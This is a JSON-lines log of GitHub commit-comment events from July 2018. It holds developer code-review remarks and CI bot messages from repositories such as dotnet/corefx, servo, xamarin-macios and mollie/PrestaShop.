{"id":"7914478663","type":"CommitCommentEvent","actor":{"login":"hzyjerry"},"repo":{"name":"Stanford-HRI/maml_rl"},"payload":{"comment":{"id":29585760,"position":null,"line":null,"path":null,"commit_id":"ac0eb2a99ed10ede1ae46a4f7e8f1ea1945345e5","created_at":"2018-07-03T19:06:50Z","updated_at":"2018-07-03T19:06:50Z","author_association":"NONE","body":"@jjw-megha can you help add me and @erdem-biyik to contributors of this repo? We're working on replicating your experiment results and would be great if we can create a new branch in this repo.\r\n\r\nThanks"}},"created_at":"2018-07-03T19:06:50Z"}
{"id":"7914481334","type":"CommitCommentEvent","actor":{"login":"ncarandini"},"repo":{"name":"v-maudel/docs-1"},"payload":{"comment":{"id":29585764,"position":null,"line":null,"path":null,"commit_id":"2d36355fbf3664fdc817e2f4ca72ac1930f08e20","created_at":"2018-07-03T19:07:26Z","updated_at":"2018-07-03T19:07:26Z","author_association":"NONE","body":"It's ok to me."}},"created_at":"2018-07-03T19:07:26Z"}
{"id":"7914482209","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29585769,"position":61,"line":303,"path":"src/System.Runtime.Extensions/src/System/AppDomain.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T19:07:37Z","updated_at":"2018-07-03T19:07:37Z","author_association":"MEMBER","body":"The `CreateDelegate` API that takes method name did not work? (just curious)"}},"created_at":"2018-07-03T19:07:37Z"}
{"id":"7914482833","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29585771,"position":29,"line":21,"path":"src/index.js","commit_id":"0f076a981c53a52efce476258d4a0e69426eea51","created_at":"2018-07-03T19:07:46Z","updated_at":"2018-07-03T19:07:46Z","author_association":"COLLABORATOR","body":"You should avoid to leave comments in the code - unless it's absolutely necessary."}},"created_at":"2018-07-03T19:07:46Z"}
{"id":"7914483616","type":"CommitCommentEvent","actor":{"login":"GeorgeGnzalz2905"},"repo":{"name":"GeorgeGnzalz2905/clase20_06"},"payload":{"comment":{"id":29585775,"position":null,"line":null,"path":null,"commit_id":"30155cb0afbc7233ffaf3b1124b90513d443fb1e","created_at":"2018-07-03T19:07:57Z","updated_at":"2018-07-03T19:07:57Z","author_association":"OWNER","body":"se realizaron estos cambios por que la base de datos en xampp se habia mareado y arrojaba errores en la coneccion al momento de ejecutar el proyecto en netbeans "}},"created_at":"2018-07-03T19:07:57Z"}
{"id":"7914484061","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29585776,"position":null,"line":null,"path":null,"commit_id":"5f77b60c3a3696eab17d7433932698dc5e6a8cfd","created_at":"2018-07-03T19:08:03Z","updated_at":"2018-07-03T19:08:03Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/CoPvRtI7RnGfwFjERXUGJw\",\n            \"queue:schedule-task:taskcluster-github/CoPvRtI7RnGfwFjERXUGJw/CoPvRtI7RnGfwFjERXUGJw\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/CoPvRtI7RnGfwFjERXUGJw\",\n                \"queue:schedule-task:taskcluster-github/CoPvRtI7RnGfwFjERXUGJw/CoPvRtI7RnGfwFjERXUGJw\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-03T19:08:03.403Z\n\n</details>"}},"created_at":"2018-07-03T19:08:03Z"}
{"id":"7914484852","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29585778,"position":53,"line":40,"path":"src/index.js","commit_id":"0f076a981c53a52efce476258d4a0e69426eea51","created_at":"2018-07-03T19:08:13Z","updated_at":"2018-07-03T19:08:13Z","author_association":"COLLABORATOR","body":"💯 \r\nLooks great!"}},"created_at":"2018-07-03T19:08:13Z"}
{"id":"7914487733","type":"CommitCommentEvent","actor":{"login":"Anipik"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29585787,"position":13,"line":89,"path":"src/System.Security.Claims/src/System/Security/Claims/GenericPrincipal.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T19:08:52Z","updated_at":"2018-07-03T19:08:52Z","author_association":"MEMBER","body":"why do we need to create a new instance every time ?"}},"created_at":"2018-07-03T19:08:52Z"}
{"id":"7914493407","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29585794,"position":27,"line":19,"path":"src/index.js","commit_id":"0f076a981c53a52efce476258d4a0e69426eea51","created_at":"2018-07-03T19:10:06Z","updated_at":"2018-07-03T19:10:06Z","author_association":"COLLABORATOR","body":"Good job!\r\nSetting the state once (as apposed to 2 twice, once for every prop) is better.\r\nThis will prevent unnecessary renders - good job."}},"created_at":"2018-07-03T19:10:06Z"}
{"id":"7914493526","type":"CommitCommentEvent","actor":{"login":"khaledaazzam"},"repo":{"name":"khaledaazzam/course-collaboration-travel-plans"},"payload":{"comment":{"id":29585795,"position":null,"line":null,"path":null,"commit_id":"574c4564eb42920fbfa7843774dd6ec62c82e963","created_at":"2018-07-03T19:10:08Z","updated_at":"2018-07-03T19:10:08Z","author_association":"OWNER","body":"new destination"}},"created_at":"2018-07-03T19:10:08Z"}
{"id":"7914495783","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29585803,"position":30,"line":22,"path":"src/index.js","commit_id":"0f076a981c53a52efce476258d4a0e69426eea51","created_at":"2018-07-03T19:10:35Z","updated_at":"2018-07-03T19:10:35Z","author_association":"COLLABORATOR","body":"Good job using the shorthand `list` as apposed to `list: list`."}},"created_at":"2018-07-03T19:10:35Z"}
{"id":"7914497182","type":"CommitCommentEvent","actor":{"login":"khaledaazzam"},"repo":{"name":"khaledaazzam/course-collaboration-travel-plans"},"payload":{"comment":{"id":29585808,"position":10,"line":18,"path":"index.html","commit_id":"574c4564eb42920fbfa7843774dd6ec62c82e963","created_at":"2018-07-03T19:10:54Z","updated_at":"2018-07-03T19:10:54Z","author_association":"OWNER","body":"syria\r\nitaly\r\nrom"}},"created_at":"2018-07-03T19:10:54Z"}
{"id":"7914499977","type":"CommitCommentEvent","actor":{"login":"khaledaazzam"},"repo":{"name":"khaledaazzam/course-collaboration-travel-plans"},"payload":{"comment":{"id":29585820,"position":9,"line":18,"path":"index.html","commit_id":"574c4564eb42920fbfa7843774dd6ec62c82e963","created_at":"2018-07-03T19:11:34Z","updated_at":"2018-07-03T19:11:34Z","author_association":"OWNER","body":"home\r\n"}},"created_at":"2018-07-03T19:11:34Z"}
{"id":"7914501010","type":"CommitCommentEvent","actor":{"login":"AlonAm"},"repo":{"name":"AnyStatus/API"},"payload":{"comment":{"id":29585825,"position":null,"line":null,"path":null,"commit_id":"164959c0f3a7cc4fb24304bde14d304692e8f507","created_at":"2018-07-03T19:11:49Z","updated_at":"2018-07-03T19:11:49Z","author_association":"MEMBER","body":"AnyStatus/support#85"}},"created_at":"2018-07-03T19:11:49Z"}
{"id":"7914502132","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29585830,"position":null,"line":null,"path":null,"commit_id":"9fd687bb7fec2b0d29a54c775cb108a03f9c9d74","created_at":"2018-07-03T19:12:04Z","updated_at":"2018-07-03T19:12:04Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `metadata_passing` |       -2 |\n| `metadata_total`   |       -2 |\n| `nodes_count`      |       +5 |\n| `texts_passing`    |       -3 |\n| `texts_total`      |       -3 |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |    +4389 |\n| `lat`     |    -5348 |\n\n## Units\n\n| Changed                                             | Status   |\n|:----------------------------------------------------|:---------|\n| `./data/tlg2034/tlg006/tlg2034.tlg006.opp-lat1.xml` | Deleted  |\n| `./data/tlg4034/tlg004/__cts__.xml`                 | Deleted  |\n| `./data/tlg4034/tlg004/tlg4034.tlg004.opp-grc1.xml` | Deleted  |\n| `./data/tlg4034/tlg005/__cts__.xml`                 | Deleted  |\n| `./data/tlg4034/tlg005/tlg4034.tlg005.opp-grc1.xml` | Deleted  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4406)*\n"}},"created_at":"2018-07-03T19:12:04Z"}
{"id":"7914506271","type":"CommitCommentEvent","actor":{"login":"khaledaazzam"},"repo":{"name":"khaledaazzam/course-collaboration-travel-plans"},"payload":{"comment":{"id":29585845,"position":null,"line":null,"path":null,"commit_id":"9039cf951bd4307ba119b3ca728c00445e116523","created_at":"2018-07-03T19:12:59Z","updated_at":"2018-07-03T19:12:59Z","author_association":"OWNER","body":"rom"}},"created_at":"2018-07-03T19:12:59Z"}
{"id":"7914506324","type":"CommitCommentEvent","actor":{"login":"sondresorbye0111"},"repo":{"name":"MAGSON-dev/scrumboard"},"payload":{"comment":{"id":29585846,"position":null,"line":null,"path":null,"commit_id":"d2ff2123cc8044dd9db68feafd813716c91fb654","created_at":"2018-07-03T19:12:59Z","updated_at":"2018-07-03T19:12:59Z","author_association":"CONTRIBUTOR","body":"nice"}},"created_at":"2018-07-03T19:12:59Z"}
{"id":"7914507555","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29585850,"position":null,"line":null,"path":null,"commit_id":"9b3d6e448765540bc279f3568af58bed55e7acf5","created_at":"2018-07-03T19:13:16Z","updated_at":"2018-07-03T19:13:16Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#pr-9](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#pr-9).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-9-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-03T19:13:16Z"}
{"id":"7914507938","type":"CommitCommentEvent","actor":{"login":"platisd"},"repo":{"name":"jeena/esp8266-button"},"payload":{"comment":{"id":29585852,"position":2,"line":1,"path":"hardware/kicad/esp8266-button.pro","commit_id":"af4c72675b59c5860c130f845da056bd1c8595cf","created_at":"2018-07-03T19:13:22Z","updated_at":"2018-07-03T19:13:22Z","author_association":"NONE","body":"Not sure how why they thought this was useful to include here but anyway. :sweat: "}},"created_at":"2018-07-03T19:13:22Z"}
{"id":"7914511042","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29585857,"position":null,"line":null,"path":null,"commit_id":"d1f9acc89767ea7caec4689cab4bdbd07f8929e3","created_at":"2018-07-03T19:14:05Z","updated_at":"2018-07-03T19:14:05Z","author_association":"COLLABORATOR","body":"This makes a message like this work:\r\n\"/tip hey can u send 1 coffee across to my boy @johnsBeharry please :)\""}},"created_at":"2018-07-03T19:14:05Z"}
{"id":"7914512683","type":"CommitCommentEvent","actor":{"login":"DU-jdto"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29585860,"position":null,"line":null,"path":null,"commit_id":"88455b93deeee133149525271950e20bdfbbf425","created_at":"2018-07-03T19:14:29Z","updated_at":"2018-07-03T19:14:29Z","author_association":"NONE","body":"alpha is by definition a lower bound on what the player to move can achieve either at the current node or at some node further up the tree. The value of bestValue is also clearly such a lower bound, as all code paths end in a value being returned that is >= the value of bestValue at any point. To have alpha < bestValue won't _break_ anything that I can see, but it makes no sense, and will result in an unnecessarily wide window being searched."}},"created_at":"2018-07-03T19:14:29Z"}
{"id":"7914517000","type":"CommitCommentEvent","actor":{"login":"marcguyer"},"repo":{"name":"bppwrite/bppwrite.github.io"},"payload":{"comment":{"id":29585873,"position":11,"line":11,"path":"content/event/2018-2019/annual-gala/index.md","commit_id":"056a1fc1e047a332a8d650ae3bea9c1debc2ee64","created_at":"2018-07-03T19:15:24Z","updated_at":"2018-07-03T19:15:24Z","author_association":"CONTRIBUTOR","body":"@JSurigao This needs to match the correct series (2018-2019). "}},"created_at":"2018-07-03T19:15:24Z"}
{"id":"7914517065","type":"CommitCommentEvent","actor":{"login":"gajus"},"repo":{"name":"particle-iot/lightship"},"payload":{"comment":{"id":29585874,"position":null,"line":null,"path":null,"commit_id":"480ee7faf096043421720b1755ae19bb681e3115","created_at":"2018-07-03T19:15:25Z","updated_at":"2018-07-03T19:15:25Z","author_association":"NONE","body":"Out of curiosity, whats the reason for removing the logger?"}},"created_at":"2018-07-03T19:15:25Z"}
{"id":"7914519983","type":"CommitCommentEvent","actor":{"login":"marcguyer"},"repo":{"name":"bppwrite/bppwrite.github.io"},"payload":{"comment":{"id":29585879,"position":23,"line":23,"path":"content/event/2018-2019/annual-gala/index.md","commit_id":"056a1fc1e047a332a8d650ae3bea9c1debc2ee64","created_at":"2018-07-03T19:15:59Z","updated_at":"2018-07-03T19:15:59Z","author_association":"CONTRIBUTOR","body":"@JSurigao These dates must be correct."}},"created_at":"2018-07-03T19:15:59Z"}
{"id":"7914520497","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29585880,"position":null,"line":null,"path":null,"commit_id":"b08f995aa48e5f7892cf2242757f512650909c40","created_at":"2018-07-03T19:16:06Z","updated_at":"2018-07-03T19:16:06Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T19:16:06Z"}
{"id":"7914522054","type":"CommitCommentEvent","actor":{"login":"Thomas2018B"},"repo":{"name":"Thomas2018B/newpprojekt"},"payload":{"comment":{"id":29585882,"position":null,"line":null,"path":null,"commit_id":"634bd10e320a464754d8789efe1375e3abe3ba5c","created_at":"2018-07-03T19:16:26Z","updated_at":"2018-07-03T19:16:26Z","author_association":"OWNER","body":"ner"}},"created_at":"2018-07-03T19:16:26Z"}
{"id":"7914523193","type":"CommitCommentEvent","actor":{"login":"gdebojyoti"},"repo":{"name":"gdebojyoti/alicanto"},"payload":{"comment":{"id":29585885,"position":null,"line":null,"path":null,"commit_id":"bb2228b9152a34cf5957e08256ec7ba3198ec7a9","created_at":"2018-07-03T19:16:43Z","updated_at":"2018-07-03T19:16:43Z","author_association":"OWNER","body":"+ Sass support."}},"created_at":"2018-07-03T19:16:43Z"}
{"id":"7914523851","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29585887,"position":null,"line":null,"path":null,"commit_id":"ee3d20fd669c1142f57b6928f48393183a244b1c","created_at":"2018-07-03T19:16:52Z","updated_at":"2018-07-03T19:16:52Z","author_association":"COLLABORATOR","body":"**This makes the following possible:**\r\n\"/tip hey can u send some coffee across to my boy @username... 2 cups please :)\""}},"created_at":"2018-07-03T19:16:52Z"}
{"id":"7914524593","type":"CommitCommentEvent","actor":{"login":"marcguyer"},"repo":{"name":"bppwrite/bppwrite.github.io"},"payload":{"comment":{"id":29585888,"position":22,"line":22,"path":"content/event/2018-2019/vintage-songs/index.md","commit_id":"056a1fc1e047a332a8d650ae3bea9c1debc2ee64","created_at":"2018-07-03T19:17:03Z","updated_at":"2018-07-03T19:17:03Z","author_association":"CONTRIBUTOR","body":"@JSurigao I think this is supposed to be 2019"}},"created_at":"2018-07-03T19:17:03Z"}
{"id":"7914528242","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29585895,"position":null,"line":null,"path":null,"commit_id":"50f8f1792f023e564aa2368e19111494df2ac35b","created_at":"2018-07-03T19:17:54Z","updated_at":"2018-07-03T19:17:54Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-399](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-399).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-399-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T19:17:54Z"}
{"id":"7914529018","type":"CommitCommentEvent","actor":{"login":"firstred"},"repo":{"name":"mollie/PrestaShop"},"payload":{"comment":{"id":29585899,"position":5,"line":380,"path":"mollie.php","commit_id":"5ffca1c827a8c11468a89b42bba9e6f9ef39badc","created_at":"2018-07-03T19:18:04Z","updated_at":"2018-07-03T19:18:04Z","author_association":"COLLABORATOR","body":"Hmmz, that's not really what I meant in the issue. When returning from the payment screen and having this option set to `0` (possible via the BO), then it breaks the `validateOrder` process because PrestaShop only accepts valid order states.\r\n\r\nWe might have to change the wording for the `open` and `paid` statuses a bit instead, from `Skip this status (0)`, to `Use the default state` and apply these statuses to enable PrestaShop to accept orders, regardless of the status chosen in the back office."}},"created_at":"2018-07-03T19:18:04Z"}
{"id":"7914530319","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey-server"},"payload":{"comment":{"id":29585901,"position":null,"line":null,"path":null,"commit_id":"e5490203a21b7e174ba11f6b3593efd74331abdf","created_at":"2018-07-03T19:18:21Z","updated_at":"2018-07-03T19:18:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Inventory API](https://trello.com/c/l6ffg8EY/9-inventory-api)"}},"created_at":"2018-07-03T19:18:21Z"}
{"id":"7914530844","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29585904,"position":null,"line":null,"path":null,"commit_id":"a42e01b21101993b62a6b2ffd3f502fcdbcee1a1","created_at":"2018-07-03T19:18:28Z","updated_at":"2018-07-03T19:18:28Z","author_association":"COLLABORATOR","body":"**This makes the following possible:**\r\n\"_/tip_ yo send coffee to @username\""}},"created_at":"2018-07-03T19:18:28Z"}
{"id":"7914535033","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29585917,"position":13,"line":89,"path":"src/System.Security.Claims/src/System/Security/Claims/GenericPrincipal.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T19:19:24Z","updated_at":"2018-07-03T19:19:24Z","author_association":"MEMBER","body":"These are stateful types, e.g. you can call `AddIdentity` on it to mutate the state. \r\n\r\nThe .NET Framwork did not create them as singletons, so we should continue not creating them as singletons to maintains compatibility."}},"created_at":"2018-07-03T19:19:24Z"}
{"id":"7914538544","type":"CommitCommentEvent","actor":{"login":"rich-iannone"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29585921,"position":14,"line":50,"path":"R/render.R","commit_id":"a18c447a74be338ca520afab77cab72d224ec3ff","created_at":"2018-07-03T19:20:15Z","updated_at":"2018-07-03T19:20:15Z","author_association":"MEMBER","body":"Sorry about the formatting errors, but it all makes sense now. Just to be really sure, I looked at the older .Rd and made sure it was an exact match for these examples."}},"created_at":"2018-07-03T19:20:15Z"}
{"id":"7914540891","type":"CommitCommentEvent","actor":{"login":"rich-iannone"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29585925,"position":14,"line":50,"path":"R/render.R","commit_id":"a18c447a74be338ca520afab77cab72d224ec3ff","created_at":"2018-07-03T19:20:47Z","updated_at":"2018-07-03T19:20:47Z","author_association":"MEMBER","body":"I will push the changes to master once again."}},"created_at":"2018-07-03T19:20:47Z"}
{"id":"7914541168","type":"CommitCommentEvent","actor":{"login":"lucripa"},"repo":{"name":"lucripa/Projetos-Cripa"},"payload":{"comment":{"id":29585926,"position":null,"line":null,"path":null,"commit_id":"2be00993f3738c95f867ba967953009cff28ec97","created_at":"2018-07-03T19:20:51Z","updated_at":"2018-07-03T19:20:51Z","author_association":"OWNER","body":"\\o/"}},"created_at":"2018-07-03T19:20:51Z"}
{"id":"7914541255","type":"CommitCommentEvent","actor":{"login":"JSurigao"},"repo":{"name":"bppwrite/bppwrite.github.io"},"payload":{"comment":{"id":29585927,"position":11,"line":11,"path":"content/event/2018-2019/annual-gala/index.md","commit_id":"056a1fc1e047a332a8d650ae3bea9c1debc2ee64","created_at":"2018-07-03T19:20:52Z","updated_at":"2018-07-03T19:20:52Z","author_association":"CONTRIBUTOR","body":"Wait, what? I changed that before I even committed anything. "}},"created_at":"2018-07-03T19:20:52Z"}
{"id":"7914542207","type":"CommitCommentEvent","actor":{"login":"JSurigao"},"repo":{"name":"bppwrite/bppwrite.github.io"},"payload":{"comment":{"id":29585931,"position":23,"line":23,"path":"content/event/2018-2019/annual-gala/index.md","commit_id":"056a1fc1e047a332a8d650ae3bea9c1debc2ee64","created_at":"2018-07-03T19:21:07Z","updated_at":"2018-07-03T19:21:07Z","author_association":"CONTRIBUTOR","body":"Also changed that. "}},"created_at":"2018-07-03T19:21:07Z"}
{"id":"7914546496","type":"CommitCommentEvent","actor":{"login":"fariouche"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29585940,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-03T19:22:07Z","updated_at":"2018-07-03T19:22:07Z","author_association":"OWNER","body":"for the function, you will not be able to find it as is. However, the exact same code is done in an other big function, in phydm_adaptivity.c \r\n\r\nSeems like they only reworked existing code (they never really add new code fortunately here)\r\nThe function is phydm_set_lna()\r\n"}},"created_at":"2018-07-03T19:22:07Z"}
{"id":"7914547515","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"dhall-lang/dhall-nix"},"payload":{"comment":{"id":29585941,"position":7,"line":33,"path":"dhall-nix.cabal","commit_id":"4c7e66bb6a39eaf9c2b888cb51a30965a88d7c75","created_at":"2018-07-03T19:22:20Z","updated_at":"2018-07-03T19:22:20Z","author_association":"NONE","body":"I fully agree - supporting latest stackage should be enough for Nix."}},"created_at":"2018-07-03T19:22:20Z"}
{"id":"7914553852","type":"CommitCommentEvent","actor":{"login":"snowycatsoftware"},"repo":{"name":"mollie/PrestaShop"},"payload":{"comment":{"id":29585955,"position":null,"line":null,"path":null,"commit_id":"5ffca1c827a8c11468a89b42bba9e6f9ef39badc","created_at":"2018-07-03T19:23:47Z","updated_at":"2018-07-03T19:23:47Z","author_association":"COLLABORATOR","body":"Pending has been removed, therefore it defaults to 'PS_OS_BANKWIRE'"}},"created_at":"2018-07-03T19:23:47Z"}
{"id":"7914555070","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29585960,"position":null,"line":null,"path":null,"commit_id":"97453a61bf5157c7f7bdace64ed13db3210e3568","created_at":"2018-07-03T19:24:04Z","updated_at":"2018-07-03T19:24:04Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-42](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-42-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-03T19:24:04Z"}
{"id":"7914575962","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29585998,"position":null,"line":null,"path":null,"commit_id":"709e855c15a245001fc4549d66d5035550250eab","created_at":"2018-07-03T19:28:48Z","updated_at":"2018-07-03T19:28:48Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/57/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/57//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/709e855c15a245001fc4549d66d5035550250eab/57/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/709e855c15a245001fc4549d66d5035550250eab/57/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/709e855c15a245001fc4549d66d5035550250eab/57/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/709e855c15a245001fc4549d66d5035550250eab/57/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n5 tests failed, 156 tests passed.\n\n## Failed tests\n\n * Mono.CSharp/tvOS - simulator/Debug: Crashed\n * System.Core/watchOS - simulator/Debug: Crashed\n * System.Net.Http/watchOS - simulator/Debug: Crashed\n * monotouch-test/watchOS - simulator/Debug (all optimizations): Crashed\n * MSBuild tests/iOS: Failed (Execution failed with exit code 1)\n"}},"created_at":"2018-07-03T19:28:48Z"}
{"id":"7914576814","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29586001,"position":89,"line":205,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/dashboard_page.tsx","commit_id":"9f1953ec9eb76cdeea521cdb94c550141a24211b","created_at":"2018-07-03T19:28:59Z","updated_at":"2018-07-03T19:28:59Z","author_association":"COLLABORATOR","body":"Place a new line before this declaration."}},"created_at":"2018-07-03T19:28:59Z"}
{"id":"7914579254","type":"CommitCommentEvent","actor":{"login":"nicopret"},"repo":{"name":"nicopret/retro"},"payload":{"comment":{"id":29586006,"position":null,"line":null,"path":null,"commit_id":"90504bca2478a4da36b525348a6bc2fef8ffb804","created_at":"2018-07-03T19:29:33Z","updated_at":"2018-07-03T19:29:33Z","author_association":"OWNER","body":"Well done :)"}},"created_at":"2018-07-03T19:29:33Z"}
